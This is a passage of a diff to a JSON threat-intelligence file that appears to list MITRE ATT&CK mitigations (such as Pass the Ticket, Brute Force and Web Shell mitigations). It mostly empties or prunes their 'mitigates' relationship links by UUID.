- "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ac008435-af58-4f77-988a-c9b96c5920f5",
"value": "NTFS File Attributes Mitigation - T1096"
},
@@ -3852,15 +2914,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "dd9a85ad-6a92-4986-a215-b01d0ce7b987",
"value": "Permission Groups Discovery Mitigation - T1069"
},
@@ -3877,15 +2931,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "308855d1-078b-47ad-8d2a-8f9b2713ffb5",
"value": "Windows Admin Shares Mitigation - T1077"
},
@@ -3904,15 +2950,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3a476d83-43eb-4fad-9b75-b1febd834e3d",
"value": "Pass the Ticket Mitigation - T1097"
},
@@ -3924,15 +2962,7 @@
"https://attack.mitre.org/mitigations/T1089"
]
},
- "related": [
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "388606d3-f38f-45bf-885d-a9dc9df3c8a8",
"value": "Disabling Security Tools Mitigation - T1089"
},
@@ -3944,15 +2974,7 @@
"https://attack.mitre.org/mitigations/T1151"
]
},
- "related": [
- {
- "dest-uuid": "e2907cea-4b43-4ed7-a570-0fdf0fbeea00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "02f0f92a-0a51-4c94-9bda-6437b9a93f22",
"value": "Space after Filename Mitigation - T1151"
},
@@ -3964,22 +2986,7 @@
"https://attack.mitre.org/mitigations/T1214"
]
},
- "related": [
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4490fee2-5c70-4db3-8db5-8d88767dbd55",
"value": "Credentials in Registry Mitigation - T1214"
},
@@ -3996,15 +3003,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "82d8e990-c901-4aed-8596-cc002e7eb307",
"value": "System Time Discovery Mitigation - T1124"
},
@@ -4021,15 +3020,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1c0b39f9-a0c5-42b2-abd8-dc8f1eb74e67",
"value": "Browser Bookmark Discovery Mitigation - T1217"
},
@@ -4044,15 +3035,7 @@
"https://attack.mitre.org/mitigations/T1128"
]
},
- "related": [
- {
- "dest-uuid": "bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "624d063d-cda8-4616-b4e4-54c04e427aec",
"value": "Netsh Helper DLL Mitigation - T1128"
},
@@ -4064,15 +3047,7 @@
"https://attack.mitre.org/mitigations/T1219"
]
},
- "related": [
- {
- "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "af093bc8-7b59-4e2a-9da8-8e839b4c50c6",
"value": "Remote Access Tools Mitigation - T1219"
},
@@ -4084,15 +3059,7 @@
"https://attack.mitre.org/mitigations/T1133"
]
},
- "related": [
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2",
"value": "External Remote Services Mitigation - T1133"
},
@@ -4106,15 +3073,7 @@
"https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token"
]
},
- "related": [
- {
- "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c61fee9f-16fb-4f8c-bbf0-869093fcd4a6",
"value": "Access Token Manipulation Mitigation - T1134"
},
@@ -4131,15 +3090,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1f34230d-b6ae-4dc7-8599-78c18820bd21",
"value": "Network Share Discovery Mitigation - T1135"
},
@@ -4158,15 +3109,7 @@
"https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/"
]
},
- "related": [
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "80c91478-ac87-434f-bee7-11f37aec4d74",
"value": "Dynamic Data Exchange Mitigation - T1173"
},
@@ -4179,22 +3122,7 @@
"https://attack.mitre.org/mitigations/T1146"
]
},
- "related": [
- {
- "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d3046a90-580c-4004-8208-66915bc29830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3e7018e9-7389-48e7-9208-0bdbcbba9483",
"value": "Clear Command History Mitigation - T1146"
},
@@ -4207,15 +3135,7 @@
"https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx"
]
},
- "related": [
- {
- "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "00d7d21b-69d6-4797-88a2-c86f3fc97651",
"value": "Password Filter DLL Mitigation - T1174"
},
@@ -4227,15 +3147,7 @@
"https://attack.mitre.org/mitigations/T1194"
]
},
- "related": [
- {
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c861bcb1-946f-450d-ab75-d4e3c1103a56",
"value": "Spearphishing via Service Mitigation - T1194"
},
@@ -4250,15 +3162,7 @@
"https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf"
]
},
- "related": [
- {
- "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "97d8eadb-0459-4c1d-bf1a-e053bd75df61",
"value": "Supply Chain Compromise Mitigation - T1195"
},
@@ -4270,15 +3174,7 @@
"https://attack.mitre.org/mitigations/T1166"
]
},
- "related": [
- {
- "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "073cc04d-ac46-4f5a-85d7-83a91ecd6a19",
"value": "Setuid and Setgid Mitigation - T1166"
},
@@ -4290,15 +3186,7 @@
"https://attack.mitre.org/mitigations/T1168"
]
},
- "related": [
- {
- "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c47a9b55-8f61-4b82-b833-1db6242c754e",
"value": "Local Job Scheduling Mitigation - T1168"
},
@@ -4314,15 +3202,7 @@
"https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx"
]
},
- "related": [
- {
- "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef",
"value": "Control Panel Items Mitigation - T1196"
},
@@ -4335,15 +3215,7 @@
"https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913"
]
},
- "related": [
- {
- "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "08e02f67-ea09-4f77-a70b-414963c29fc2",
"value": "Compiled HTML File Mitigation - T1223"
},
@@ -4356,15 +3228,7 @@
"https://attack.mitre.org/mitigations/T1482"
]
},
- "related": [
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "159b4ee4-8fa1-44a5-b095-2973f3c7e25e",
"value": "Domain Trust Discovery Mitigation - T1482"
},
@@ -4377,15 +3241,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e9362d25-4427-446b-99e8-b8f0c3b86615",
"value": "Stored Data Manipulation Mitigation - T1492"
},
@@ -4401,22 +3257,7 @@
"https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/"
]
},
- "related": [
- {
- "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3bd2cf87-1ceb-4317-9aee-3e7dc713261b",
"value": "Domain Generation Algorithms Mitigation - T1483"
},
@@ -4428,15 +3269,7 @@
"https://attack.mitre.org/mitigations/T1493"
]
},
- "related": [
- {
- "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "245075bc-f992-4d89-af8c-834c53d403f4",
"value": "Transmitted Data Manipulation Mitigation - T1493"
},
@@ -4453,15 +3286,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "337172b1-b003-4034-8a3f-1d89a71da628",
"value": "Runtime Data Manipulation Mitigation - T1494"
},
@@ -4477,15 +3302,7 @@
"https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)"
]
},
- "related": [
- {
- "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "54246e2e-683f-4bf2-be4c-d7d5a60e7d22",
"value": "LLMNR/NBT-NS Poisoning Mitigation - T1171"
},
@@ -4512,20 +3329,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "27960489-4e7f-461d-a62a-f5c0cb521e4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
"tags": [
@@ -4547,20 +3350,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -4624,6 +3413,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "ba04e672-da86-4e69-aa15-0eca5db25f43",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
"tags": [
@@ -4638,20 +3434,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -4707,15 +3489,7 @@
"https://attack.mitre.org/mitigations/T1104"
]
},
- "related": [
- {
- "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "514e7371-a344-4de7-8ec3-3aa42b801d52",
"value": "Multi-Stage Channels Mitigation - T1104"
},
@@ -4727,15 +3501,7 @@
"https://attack.mitre.org/mitigations/T1072"
]
},
- "related": [
- {
- "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "160af6af-e733-4b6a-a04a-71c620ac0930",
"value": "Third-party Software Mitigation - T1072"
},
@@ -4747,15 +3513,7 @@
"https://attack.mitre.org/mitigations/T1073"
]
},
- "related": [
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7a14d974-f3d9-4e4e-9b7d-980385762908",
"value": "DLL Side-Loading Mitigation - T1073"
},
@@ -4768,15 +3526,7 @@
"https://support.apple.com/en-us/HT204005"
]
},
- "related": [
- {
- "dest-uuid": "6a3be63a-64c5-4678-a036-03ff8fc35300",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "61d02387-351a-453e-a575-160a9abc3e04",
"value": "Re-opened Applications Mitigation - T1164"
},
@@ -4792,15 +3542,7 @@
"https://technet.microsoft.com/library/cc835085.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b91c2f9e-c1a0-44df-95f0-9e7c9d1d5e55",
"value": "SID-History Injection Mitigation - T1178"
},
@@ -4812,15 +3554,7 @@
"https://attack.mitre.org/mitigations/T1188"
]
},
- "related": [
- {
- "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "752db800-ea54-4e7a-b4c1-2a0292350ea7",
"value": "Multi-hop Proxy Mitigation - T1188"
},
@@ -4836,15 +3570,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7a4d0054-53cd-476f-88af-955dddc80ee0",
"value": "Drive-by Compromise Mitigation - T1189"
},
@@ -4857,15 +3583,7 @@
"https://attack.mitre.org/mitigations/T1001"
]
},
- "related": [
- {
- "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d0fcf37a-b6c4-4745-9c43-4fcdb8bfc88e",
"value": "Data Obfuscation Mitigation - T1001"
},
@@ -4878,15 +3596,7 @@
"https://www.us-cert.gov/ncas/alerts/TA15-314A"
]
},
- "related": [
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bcc91b8c-f104-4710-964e-1d5409666736",
"value": "Web Shell Mitigation - T1100"
},
@@ -4903,15 +3613,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2497ac92-e751-4391-82c6-1b86e34d0294",
"value": "Automated Exfiltration Mitigation - T1020"
},
@@ -4924,15 +3626,7 @@
"https://en.wikipedia.org/wiki/IEEE_802.1X"
]
},
- "related": [
- {
- "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "54e8722d-2faf-4b1b-93b6-6cbf9551669f",
"value": "Hardware Additions Mitigation - T1200"
},
@@ -4949,15 +3643,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "28adf6fd-ab6c-4553-9aa7-cef18a191f33",
"value": "Data Compressed Mitigation - T1002"
},
@@ -4981,15 +3667,7 @@
"https://technet.microsoft.com/library/jj865668.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "aeff5887-8f9e-48d5-a523-9b395e2ce80a",
"value": "Credential Dumping Mitigation - T1003"
},
@@ -5068,15 +3746,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "46b7ef91-4e1d-43c5-a2eb-00fa9444f6f4",
"value": "Network Sniffing Mitigation - T1040"
},
@@ -5093,15 +3763,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b7b2c89c-09c1-4b71-ae7c-000ec2893aab",
"value": "New Service Mitigation - T1050"
},
@@ -5114,15 +3776,7 @@
"https://attack.mitre.org/mitigations/T1008"
]
},
- "related": [
- {
- "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "515f6584-fa98-44fe-a4e8-e428c7188514",
"value": "Fallback Channels Mitigation - T1008"
},
@@ -5139,15 +3793,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "519630c5-f03f-4882-825c-3af924935817",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "16a8ac85-a06f-460f-ad22-910167bd7332",
"value": "Binary Padding Mitigation - T1009"
},
@@ -5182,15 +3828,7 @@
"https://pages.nist.gov/800-63-3/sp800-63b.html"
]
},
- "related": [
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4a99fecc-680b-448e-8fe7-8144c60d272c",
"value": "Brute Force Mitigation - T1110"
},
@@ -5207,15 +3845,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0640214c-95af-4c04-a574-2a1ba6dda00b",
"value": "Query Registry Mitigation - T1012"
},
@@ -5228,15 +3858,7 @@
"https://attack.mitre.org/mitigations/T1102"
]
},
- "related": [
- {
- "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4689b9fb-dca4-473e-831b-34717ad50c97",
"value": "Web Service Mitigation - T1102"
},
@@ -5376,15 +3998,7 @@
"https://attack.mitre.org/mitigations/T1103"
]
},
- "related": [
- {
- "dest-uuid": "317fefa6-46c7-4062-adb6-2008cf6bcb41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "10571bf2-8073-4edf-a71c-23bad225532e",
"value": "AppInit DLLs Mitigation - T1103"
},
@@ -5460,13 +4074,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
"tags": [
@@ -5474,20 +4081,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466",
"tags": [
@@ -5509,13 +4102,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
"tags": [
@@ -5544,20 +4130,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
"tags": [
@@ -5614,13 +4186,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9a60a291-8960-4387-8a4a-2ab5c18bb50b",
"tags": [
@@ -5684,13 +4249,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
"tags": [
@@ -5733,13 +4291,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cabe189c-a0e3-4965-a473-dcff00f17213",
"tags": [
@@ -5824,13 +4375,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
"tags": [
@@ -5865,15 +4409,7 @@
"https://attack.mitre.org/mitigations/T1013"
]
},
- "related": [
- {
- "dest-uuid": "1f47e2fd-fa77-4f2f-88ee-e85df308f125",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1c6bc7f3-d517-4971-aed4-8f939090846b",
"value": "Port Monitors Mitigation - T1013"
},
@@ -5907,13 +4443,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
"tags": [
@@ -5935,13 +4464,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "27960489-4e7f-461d-a62a-f5c0cb521e4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36",
"tags": [
@@ -5998,13 +4520,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
"tags": [
@@ -6054,13 +4569,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -6075,13 +4583,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d0613359-5781-4fd2-b5be-c269270be1f6",
"tags": [
@@ -6144,13 +4645,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
"tags": [
@@ -6215,7 +4709,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
